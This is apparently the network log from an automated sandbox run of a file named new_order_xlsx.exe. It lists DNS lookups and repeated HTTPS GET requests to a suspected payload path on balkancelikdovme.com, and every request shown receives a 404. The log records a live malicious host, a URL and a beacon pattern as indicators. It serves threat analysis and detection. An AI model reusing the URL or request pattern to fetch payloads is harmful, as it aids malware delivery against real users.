                      Sep 4, 2023 16:25:18.805193901 CEST49733443192.168.2.4185.181.116.217
                      Sep 4, 2023 16:25:18.805243969 CEST44349733185.181.116.217192.168.2.4
                      Sep 4, 2023 16:25:18.805346966 CEST49733443192.168.2.4185.181.116.217
                      Sep 4, 2023 16:25:18.806408882 CEST49733443192.168.2.4185.181.116.217
                      Sep 4, 2023 16:25:18.806435108 CEST44349733185.181.116.217192.168.2.4
                      Sep 4, 2023 16:25:18.890763998 CEST44349733185.181.116.217192.168.2.4
                      Sep 4, 2023 16:25:18.891042948 CEST49733443192.168.2.4185.181.116.217
                      Sep 4, 2023 16:25:19.834747076 CEST49733443192.168.2.4185.181.116.217
                      Sep 4, 2023 16:25:19.834779978 CEST44349733185.181.116.217192.168.2.4
                      Sep 4, 2023 16:25:19.835655928 CEST44349733185.181.116.217192.168.2.4
                      Sep 4, 2023 16:25:19.837441921 CEST49733443192.168.2.4185.181.116.217
                      Sep 4, 2023 16:25:19.871179104 CEST44349733185.181.116.217192.168.2.4
                      Sep 4, 2023 16:25:19.871316910 CEST44349733185.181.116.217192.168.2.4
                      Sep 4, 2023 16:25:19.871583939 CEST49733443192.168.2.4185.181.116.217
                      Sep 4, 2023 16:25:19.872083902 CEST49733443192.168.2.4185.181.116.217
                      Sep 4, 2023 16:25:19.872106075 CEST44349733185.181.116.217192.168.2.4
                      Sep 4, 2023 16:25:19.872126102 CEST49733443192.168.2.4185.181.116.217
                      Sep 4, 2023 16:25:19.872134924 CEST44349733185.181.116.217192.168.2.4
                      Sep 4, 2023 16:25:20.123507023 CEST49734443192.168.2.4185.181.116.217
                      Sep 4, 2023 16:25:20.123554945 CEST44349734185.181.116.217192.168.2.4
                      Sep 4, 2023 16:25:20.123647928 CEST49734443192.168.2.4185.181.116.217
                      Sep 4, 2023 16:25:20.124667883 CEST49734443192.168.2.4185.181.116.217
                      Sep 4, 2023 16:25:20.124692917 CEST44349734185.181.116.217192.168.2.4
                      Sep 4, 2023 16:25:20.205039024 CEST44349734185.181.116.217192.168.2.4
                      Sep 4, 2023 16:25:20.205214024 CEST49734443192.168.2.4185.181.116.217
                      Sep 4, 2023 16:25:20.207003117 CEST49734443192.168.2.4185.181.116.217
                      Sep 4, 2023 16:25:20.207024097 CEST44349734185.181.116.217192.168.2.4
                      Sep 4, 2023 16:25:20.207650900 CEST44349734185.181.116.217192.168.2.4
                      Sep 4, 2023 16:25:20.209428072 CEST49734443192.168.2.4185.181.116.217
                      Sep 4, 2023 16:25:20.251498938 CEST44349734185.181.116.217192.168.2.4
                      Sep 4, 2023 16:25:20.306358099 CEST44349734185.181.116.217192.168.2.4
                      Sep 4, 2023 16:25:20.306564093 CEST44349734185.181.116.217192.168.2.4
                      Sep 4, 2023 16:25:20.306663036 CEST49734443192.168.2.4185.181.116.217
                      Sep 4, 2023 16:25:20.306844950 CEST49734443192.168.2.4185.181.116.217
                      Sep 4, 2023 16:25:20.306865931 CEST44349734185.181.116.217192.168.2.4
                      Sep 4, 2023 16:25:20.306886911 CEST49734443192.168.2.4185.181.116.217
                      Sep 4, 2023 16:25:20.306900024 CEST44349734185.181.116.217192.168.2.4
                      Sep 4, 2023 16:25:20.579827070 CEST49735443192.168.2.4185.181.116.217
                      Sep 4, 2023 16:25:20.579941034 CEST44349735185.181.116.217192.168.2.4
                      Sep 4, 2023 16:25:20.580051899 CEST49735443192.168.2.4185.181.116.217
                      Sep 4, 2023 16:25:20.580946922 CEST49735443192.168.2.4185.181.116.217
                      Sep 4, 2023 16:25:20.580996037 CEST44349735185.181.116.217192.168.2.4
                      Sep 4, 2023 16:25:20.662024975 CEST44349735185.181.116.217192.168.2.4
                      Sep 4, 2023 16:25:20.662240982 CEST49735443192.168.2.4185.181.116.217
                      Sep 4, 2023 16:25:20.664026976 CEST49735443192.168.2.4185.181.116.217
                      Sep 4, 2023 16:25:20.664057970 CEST44349735185.181.116.217192.168.2.4
                      Sep 4, 2023 16:25:20.664453983 CEST44349735185.181.116.217192.168.2.4
                      Sep 4, 2023 16:25:20.666341066 CEST49735443192.168.2.4185.181.116.217
                      Sep 4, 2023 16:25:20.707499981 CEST44349735185.181.116.217192.168.2.4
                      Sep 4, 2023 16:25:20.765058994 CEST44349735185.181.116.217192.168.2.4
                      Sep 4, 2023 16:25:20.765218019 CEST44349735185.181.116.217192.168.2.4
                      Sep 4, 2023 16:25:20.765312910 CEST49735443192.168.2.4185.181.116.217
                      Sep 4, 2023 16:25:20.765708923 CEST49735443192.168.2.4185.181.116.217
                      Sep 4, 2023 16:25:20.765748024 CEST44349735185.181.116.217192.168.2.4
                      Sep 4, 2023 16:25:20.765779972 CEST49735443192.168.2.4185.181.116.217
                      Sep 4, 2023 16:25:20.765794992 CEST44349735185.181.116.217192.168.2.4
                      Sep 4, 2023 16:25:21.008512020 CEST49736443192.168.2.4185.181.116.217
                      Sep 4, 2023 16:25:21.008567095 CEST44349736185.181.116.217192.168.2.4
                      Sep 4, 2023 16:25:21.008666992 CEST49736443192.168.2.4185.181.116.217
                      Sep 4, 2023 16:25:21.009418964 CEST49736443192.168.2.4185.181.116.217
                      Sep 4, 2023 16:25:21.009449005 CEST44349736185.181.116.217192.168.2.4
                      Sep 4, 2023 16:25:21.093672037 CEST44349736185.181.116.217192.168.2.4
                      Sep 4, 2023 16:25:21.093907118 CEST49736443192.168.2.4185.181.116.217
                      Sep 4, 2023 16:25:21.099579096 CEST49736443192.168.2.4185.181.116.217
                      Sep 4, 2023 16:25:21.099598885 CEST44349736185.181.116.217192.168.2.4
                      Sep 4, 2023 16:25:21.099994898 CEST44349736185.181.116.217192.168.2.4
                      Sep 4, 2023 16:25:21.101897955 CEST49736443192.168.2.4185.181.116.217
                      Sep 4, 2023 16:25:21.143488884 CEST44349736185.181.116.217192.168.2.4
                      Sep 4, 2023 16:25:21.193260908 CEST44349736185.181.116.217192.168.2.4
                      Sep 4, 2023 16:25:21.193510056 CEST44349736185.181.116.217192.168.2.4
                      Sep 4, 2023 16:25:21.193583965 CEST49736443192.168.2.4185.181.116.217
                      Sep 4, 2023 16:25:21.193909883 CEST49736443192.168.2.4185.181.116.217
                      Sep 4, 2023 16:25:21.193947077 CEST44349736185.181.116.217192.168.2.4
                      Sep 4, 2023 16:25:21.193979025 CEST49736443192.168.2.4185.181.116.217
                      Sep 4, 2023 16:25:21.194000006 CEST44349736185.181.116.217192.168.2.4
                      Sep 4, 2023 16:25:21.451380014 CEST49739443192.168.2.4185.181.116.217
                      Sep 4, 2023 16:25:21.451440096 CEST44349739185.181.116.217192.168.2.4
                      Sep 4, 2023 16:25:21.451653004 CEST49739443192.168.2.4185.181.116.217
                      Sep 4, 2023 16:25:21.452624083 CEST49739443192.168.2.4185.181.116.217
                      Sep 4, 2023 16:25:21.452660084 CEST44349739185.181.116.217192.168.2.4
                      Sep 4, 2023 16:25:21.525006056 CEST49739443192.168.2.4185.181.116.217
                      TimestampSource PortDest PortSource IPDest IP
                      Sep 4, 2023 16:25:05.575303078 CEST6083853192.168.2.48.8.8.8
                      Sep 4, 2023 16:25:05.620600939 CEST53608388.8.8.8192.168.2.4
                      Sep 4, 2023 16:25:06.434834003 CEST5381953192.168.2.48.8.8.8
                      Sep 4, 2023 16:25:06.463491917 CEST53538198.8.8.8192.168.2.4
                      Sep 4, 2023 16:25:06.961570024 CEST6031653192.168.2.48.8.8.8
                      Sep 4, 2023 16:25:07.013015032 CEST53603168.8.8.8192.168.2.4
                      Sep 4, 2023 16:25:07.498899937 CEST5181653192.168.2.48.8.8.8
                      Sep 4, 2023 16:25:07.549941063 CEST53518168.8.8.8192.168.2.4
                      Sep 4, 2023 16:25:08.098206997 CEST5139153192.168.2.48.8.8.8
                      Sep 4, 2023 16:25:08.118978977 CEST53513918.8.8.8192.168.2.4
                      Sep 4, 2023 16:25:08.599731922 CEST4978553192.168.2.48.8.8.8
                      Sep 4, 2023 16:25:08.628264904 CEST53497858.8.8.8192.168.2.4
                      Sep 4, 2023 16:25:09.114962101 CEST6387253192.168.2.48.8.8.8
                      Sep 4, 2023 16:25:09.135543108 CEST53638728.8.8.8192.168.2.4
                      Sep 4, 2023 16:25:09.636549950 CEST6336253192.168.2.48.8.8.8
                      Sep 4, 2023 16:25:09.665587902 CEST53633628.8.8.8192.168.2.4
                      Sep 4, 2023 16:25:10.140963078 CEST4981753192.168.2.48.8.8.8
                      Sep 4, 2023 16:25:10.164767981 CEST53498178.8.8.8192.168.2.4
                      Sep 4, 2023 16:25:10.643671989 CEST6255053192.168.2.48.8.8.8
                      Sep 4, 2023 16:25:10.673650980 CEST53625508.8.8.8192.168.2.4
                      Sep 4, 2023 16:25:11.163892031 CEST5330053192.168.2.48.8.8.8
                      Sep 4, 2023 16:25:11.210169077 CEST53533008.8.8.8192.168.2.4
                      Sep 4, 2023 16:25:11.726598024 CEST6480353192.168.2.48.8.8.8
                      Sep 4, 2023 16:25:11.755886078 CEST53648038.8.8.8192.168.2.4
                      Sep 4, 2023 16:25:12.198581934 CEST6482953192.168.2.48.8.8.8
                      Sep 4, 2023 16:25:12.227757931 CEST53648298.8.8.8192.168.2.4
                      Sep 4, 2023 16:25:12.679536104 CEST5438853192.168.2.48.8.8.8
                      Sep 4, 2023 16:25:12.703260899 CEST53543888.8.8.8192.168.2.4
                      Sep 4, 2023 16:25:13.147813082 CEST5845853192.168.2.48.8.8.8
                      Sep 4, 2023 16:25:13.177133083 CEST53584588.8.8.8192.168.2.4
                      Sep 4, 2023 16:25:13.679564953 CEST6452253192.168.2.48.8.8.8
                      Sep 4, 2023 16:25:13.708467960 CEST53645228.8.8.8192.168.2.4
                      Sep 4, 2023 16:25:14.122970104 CEST5365353192.168.2.48.8.8.8
                      Sep 4, 2023 16:25:14.143548965 CEST53536538.8.8.8192.168.2.4
                      Sep 4, 2023 16:25:14.561688900 CEST5208653192.168.2.48.8.8.8
                      Sep 4, 2023 16:25:14.590938091 CEST53520868.8.8.8192.168.2.4
                      Sep 4, 2023 16:25:15.039863110 CEST6419653192.168.2.48.8.8.8
                      Sep 4, 2023 16:25:15.061228037 CEST53641968.8.8.8192.168.2.4
                      Sep 4, 2023 16:25:15.523721933 CEST5486353192.168.2.48.8.8.8
                      Sep 4, 2023 16:25:15.538836956 CEST53548638.8.8.8192.168.2.4
                      Sep 4, 2023 16:25:16.168179035 CEST5539853192.168.2.48.8.8.8
                      Sep 4, 2023 16:25:16.191930056 CEST53553988.8.8.8192.168.2.4
                      Sep 4, 2023 16:25:17.210829973 CEST4998553192.168.2.48.8.8.8
                      Sep 4, 2023 16:25:17.225974083 CEST53499858.8.8.8192.168.2.4
                      Sep 4, 2023 16:25:18.204344988 CEST5127353192.168.2.48.8.8.8
                      Sep 4, 2023 16:25:18.233377934 CEST53512738.8.8.8192.168.2.4
                      Sep 4, 2023 16:25:18.774104118 CEST6133053192.168.2.48.8.8.8
                      Sep 4, 2023 16:25:18.803982019 CEST53613308.8.8.8192.168.2.4
                      Sep 4, 2023 16:25:20.091885090 CEST6092653192.168.2.48.8.8.8
                      Sep 4, 2023 16:25:20.120968103 CEST53609268.8.8.8192.168.2.4
                      Sep 4, 2023 16:25:20.543001890 CEST5930053192.168.2.48.8.8.8
                      Sep 4, 2023 16:25:20.566848993 CEST53593008.8.8.8192.168.2.4
                      Sep 4, 2023 16:25:20.986812115 CEST4924753192.168.2.48.8.8.8
                      Sep 4, 2023 16:25:21.007106066 CEST53492478.8.8.8192.168.2.4
                      Sep 4, 2023 16:25:21.418852091 CEST5428953192.168.2.48.8.8.8
                      Sep 4, 2023 16:25:21.448584080 CEST53542898.8.8.8192.168.2.4
                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                      Sep 4, 2023 16:25:05.575303078 CEST192.168.2.48.8.8.80xc573Standard query (0)balkancelikdovme.comA (IP address)IN (0x0001)false
                      Sep 4, 2023 16:25:06.434834003 CEST192.168.2.48.8.8.80xf6b7Standard query (0)balkancelikdovme.comA (IP address)IN (0x0001)false
                      Sep 4, 2023 16:25:06.961570024 CEST192.168.2.48.8.8.80xb130Standard query (0)balkancelikdovme.comA (IP address)IN (0x0001)false
                      Sep 4, 2023 16:25:07.498899937 CEST192.168.2.48.8.8.80x4ae3Standard query (0)balkancelikdovme.comA (IP address)IN (0x0001)false
                      Sep 4, 2023 16:25:08.098206997 CEST192.168.2.48.8.8.80x780dStandard query (0)balkancelikdovme.comA (IP address)IN (0x0001)false
                      Sep 4, 2023 16:25:08.599731922 CEST192.168.2.48.8.8.80x89feStandard query (0)balkancelikdovme.comA (IP address)IN (0x0001)false
                      Sep 4, 2023 16:25:09.114962101 CEST192.168.2.48.8.8.80xb8bfStandard query (0)balkancelikdovme.comA (IP address)IN (0x0001)false
                      Sep 4, 2023 16:25:09.636549950 CEST192.168.2.48.8.8.80x7b3eStandard query (0)balkancelikdovme.comA (IP address)IN (0x0001)false
                      Sep 4, 2023 16:25:10.140963078 CEST192.168.2.48.8.8.80xca87Standard query (0)balkancelikdovme.comA (IP address)IN (0x0001)false
                      Sep 4, 2023 16:25:10.643671989 CEST192.168.2.48.8.8.80x98b5Standard query (0)balkancelikdovme.comA (IP address)IN (0x0001)false
                      Sep 4, 2023 16:25:11.163892031 CEST192.168.2.48.8.8.80xf4c6Standard query (0)balkancelikdovme.comA (IP address)IN (0x0001)false
                      Sep 4, 2023 16:25:11.726598024 CEST192.168.2.48.8.8.80xede6Standard query (0)balkancelikdovme.comA (IP address)IN (0x0001)false
                      Sep 4, 2023 16:25:12.198581934 CEST192.168.2.48.8.8.80x7527Standard query (0)balkancelikdovme.comA (IP address)IN (0x0001)false
                      Sep 4, 2023 16:25:12.679536104 CEST192.168.2.48.8.8.80x3c6bStandard query (0)balkancelikdovme.comA (IP address)IN (0x0001)false
                      Sep 4, 2023 16:25:13.147813082 CEST192.168.2.48.8.8.80x30f3Standard query (0)balkancelikdovme.comA (IP address)IN (0x0001)false
                      Sep 4, 2023 16:25:13.679564953 CEST192.168.2.48.8.8.80x3136Standard query (0)balkancelikdovme.comA (IP address)IN (0x0001)false
                      Sep 4, 2023 16:25:14.122970104 CEST192.168.2.48.8.8.80x2c36Standard query (0)balkancelikdovme.comA (IP address)IN (0x0001)false
                      Sep 4, 2023 16:25:14.561688900 CEST192.168.2.48.8.8.80xbec6Standard query (0)balkancelikdovme.comA (IP address)IN (0x0001)false
                      Sep 4, 2023 16:25:15.039863110 CEST192.168.2.48.8.8.80xadc5Standard query (0)balkancelikdovme.comA (IP address)IN (0x0001)false
                      Sep 4, 2023 16:25:15.523721933 CEST192.168.2.48.8.8.80xded9Standard query (0)balkancelikdovme.comA (IP address)IN (0x0001)false
                      Sep 4, 2023 16:25:16.168179035 CEST192.168.2.48.8.8.80x9c9dStandard query (0)balkancelikdovme.comA (IP address)IN (0x0001)false
                      Sep 4, 2023 16:25:17.210829973 CEST192.168.2.48.8.8.80x59d1Standard query (0)balkancelikdovme.comA (IP address)IN (0x0001)false
                      Sep 4, 2023 16:25:18.204344988 CEST192.168.2.48.8.8.80xa4e7Standard query (0)balkancelikdovme.comA (IP address)IN (0x0001)false
                      Sep 4, 2023 16:25:18.774104118 CEST192.168.2.48.8.8.80x559dStandard query (0)balkancelikdovme.comA (IP address)IN (0x0001)false
                      Sep 4, 2023 16:25:20.091885090 CEST192.168.2.48.8.8.80xb71fStandard query (0)balkancelikdovme.comA (IP address)IN (0x0001)false
                      Sep 4, 2023 16:25:20.543001890 CEST192.168.2.48.8.8.80x9a64Standard query (0)balkancelikdovme.comA (IP address)IN (0x0001)false
                      Sep 4, 2023 16:25:20.986812115 CEST192.168.2.48.8.8.80xcfddStandard query (0)balkancelikdovme.comA (IP address)IN (0x0001)false
                      Sep 4, 2023 16:25:21.418852091 CEST192.168.2.48.8.8.80xba38Standard query (0)balkancelikdovme.comA (IP address)IN (0x0001)false
                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                      Sep 4, 2023 16:25:05.620600939 CEST8.8.8.8192.168.2.40xc573No error (0)balkancelikdovme.com185.181.116.217A (IP address)IN (0x0001)false
                      Sep 4, 2023 16:25:06.463491917 CEST8.8.8.8192.168.2.40xf6b7No error (0)balkancelikdovme.com185.181.116.217A (IP address)IN (0x0001)false
                      Sep 4, 2023 16:25:07.013015032 CEST8.8.8.8192.168.2.40xb130No error (0)balkancelikdovme.com185.181.116.217A (IP address)IN (0x0001)false
                      Sep 4, 2023 16:25:07.549941063 CEST8.8.8.8192.168.2.40x4ae3No error (0)balkancelikdovme.com185.181.116.217A (IP address)IN (0x0001)false
                      Sep 4, 2023 16:25:08.118978977 CEST8.8.8.8192.168.2.40x780dNo error (0)balkancelikdovme.com185.181.116.217A (IP address)IN (0x0001)false
                      Sep 4, 2023 16:25:08.628264904 CEST8.8.8.8192.168.2.40x89feNo error (0)balkancelikdovme.com185.181.116.217A (IP address)IN (0x0001)false
                      Sep 4, 2023 16:25:09.135543108 CEST8.8.8.8192.168.2.40xb8bfNo error (0)balkancelikdovme.com185.181.116.217A (IP address)IN (0x0001)false
                      Sep 4, 2023 16:25:09.665587902 CEST8.8.8.8192.168.2.40x7b3eNo error (0)balkancelikdovme.com185.181.116.217A (IP address)IN (0x0001)false
                      Sep 4, 2023 16:25:10.164767981 CEST8.8.8.8192.168.2.40xca87No error (0)balkancelikdovme.com185.181.116.217A (IP address)IN (0x0001)false
                      Sep 4, 2023 16:25:10.673650980 CEST8.8.8.8192.168.2.40x98b5No error (0)balkancelikdovme.com185.181.116.217A (IP address)IN (0x0001)false
                      Sep 4, 2023 16:25:11.210169077 CEST8.8.8.8192.168.2.40xf4c6No error (0)balkancelikdovme.com185.181.116.217A (IP address)IN (0x0001)false
                      Sep 4, 2023 16:25:11.755886078 CEST8.8.8.8192.168.2.40xede6No error (0)balkancelikdovme.com185.181.116.217A (IP address)IN (0x0001)false
                      Sep 4, 2023 16:25:12.227757931 CEST8.8.8.8192.168.2.40x7527No error (0)balkancelikdovme.com185.181.116.217A (IP address)IN (0x0001)false
                      Sep 4, 2023 16:25:12.703260899 CEST8.8.8.8192.168.2.40x3c6bNo error (0)balkancelikdovme.com185.181.116.217A (IP address)IN (0x0001)false
                      Sep 4, 2023 16:25:13.177133083 CEST8.8.8.8192.168.2.40x30f3No error (0)balkancelikdovme.com185.181.116.217A (IP address)IN (0x0001)false
                      Sep 4, 2023 16:25:13.708467960 CEST8.8.8.8192.168.2.40x3136No error (0)balkancelikdovme.com185.181.116.217A (IP address)IN (0x0001)false
                      Sep 4, 2023 16:25:14.143548965 CEST8.8.8.8192.168.2.40x2c36No error (0)balkancelikdovme.com185.181.116.217A (IP address)IN (0x0001)false
                      Sep 4, 2023 16:25:14.590938091 CEST8.8.8.8192.168.2.40xbec6No error (0)balkancelikdovme.com185.181.116.217A (IP address)IN (0x0001)false
                      Sep 4, 2023 16:25:15.061228037 CEST8.8.8.8192.168.2.40xadc5No error (0)balkancelikdovme.com185.181.116.217A (IP address)IN (0x0001)false
                      Sep 4, 2023 16:25:15.538836956 CEST8.8.8.8192.168.2.40xded9No error (0)balkancelikdovme.com185.181.116.217A (IP address)IN (0x0001)false
                      Sep 4, 2023 16:25:16.191930056 CEST8.8.8.8192.168.2.40x9c9dNo error (0)balkancelikdovme.com185.181.116.217A (IP address)IN (0x0001)false
                      Sep 4, 2023 16:25:17.225974083 CEST8.8.8.8192.168.2.40x59d1No error (0)balkancelikdovme.com185.181.116.217A (IP address)IN (0x0001)false
                      Sep 4, 2023 16:25:18.233377934 CEST8.8.8.8192.168.2.40xa4e7No error (0)balkancelikdovme.com185.181.116.217A (IP address)IN (0x0001)false
                      Sep 4, 2023 16:25:18.803982019 CEST8.8.8.8192.168.2.40x559dNo error (0)balkancelikdovme.com185.181.116.217A (IP address)IN (0x0001)false
                      Sep 4, 2023 16:25:20.120968103 CEST8.8.8.8192.168.2.40xb71fNo error (0)balkancelikdovme.com185.181.116.217A (IP address)IN (0x0001)false
                      Sep 4, 2023 16:25:20.566848993 CEST8.8.8.8192.168.2.40x9a64No error (0)balkancelikdovme.com185.181.116.217A (IP address)IN (0x0001)false
                      Sep 4, 2023 16:25:21.007106066 CEST8.8.8.8192.168.2.40xcfddNo error (0)balkancelikdovme.com185.181.116.217A (IP address)IN (0x0001)false
                      Sep 4, 2023 16:25:21.448584080 CEST8.8.8.8192.168.2.40xba38No error (0)balkancelikdovme.com185.181.116.217A (IP address)IN (0x0001)false
                      • balkancelikdovme.com
                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      0192.168.2.449708185.181.116.217443C:\Users\user\Desktop\new_order_xlsx.exe
                      TimestampkBytes transferredDirectionData
                      2023-09-04 14:25:06 UTC0OUTGET /hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                      Host: balkancelikdovme.com
                      2023-09-04 14:25:06 UTC0INHTTP/1.1 404 Not Found
                      Connection: close
                      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                      pragma: no-cache
                      content-type: text/html
                      content-length: 708
                      date: Mon, 04 Sep 2023 14:25:05 GMT
                      vary: User-Agent
                      alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                      2023-09-04 14:25:06 UTC0INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      1192.168.2.449709185.181.116.217443C:\Users\user\Desktop\new_order_xlsx.exe
                      TimestampkBytes transferredDirectionData
                      2023-09-04 14:25:06 UTC1OUTGET /hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                      Host: balkancelikdovme.com
                      2023-09-04 14:25:06 UTC1INHTTP/1.1 404 Not Found
                      Connection: close
                      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                      pragma: no-cache
                      content-type: text/html
                      content-length: 708
                      date: Mon, 04 Sep 2023 14:25:06 GMT
                      vary: User-Agent
                      alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                      2023-09-04 14:25:06 UTC1INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      10192.168.2.449718185.181.116.217443C:\Users\user\Desktop\new_order_xlsx.exe
                      TimestampkBytes transferredDirectionData
                      2023-09-04 14:25:11 UTC12OUTGET /hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                      Host: balkancelikdovme.com
                      2023-09-04 14:25:11 UTC13INHTTP/1.1 404 Not Found
                      Connection: close
                      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                      pragma: no-cache
                      content-type: text/html
                      content-length: 708
                      date: Mon, 04 Sep 2023 14:25:11 GMT
                      vary: User-Agent
                      alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                      2023-09-04 14:25:11 UTC13INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      11192.168.2.449719185.181.116.217443C:\Users\user\Desktop\new_order_xlsx.exe
                      TimestampkBytes transferredDirectionData
                      2023-09-04 14:25:11 UTC14OUTGET /hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                      Host: balkancelikdovme.com
                      2023-09-04 14:25:11 UTC14INHTTP/1.1 404 Not Found
                      Connection: close
                      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                      pragma: no-cache
                      content-type: text/html
                      content-length: 708
                      date: Mon, 04 Sep 2023 14:25:11 GMT
                      vary: User-Agent
                      alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
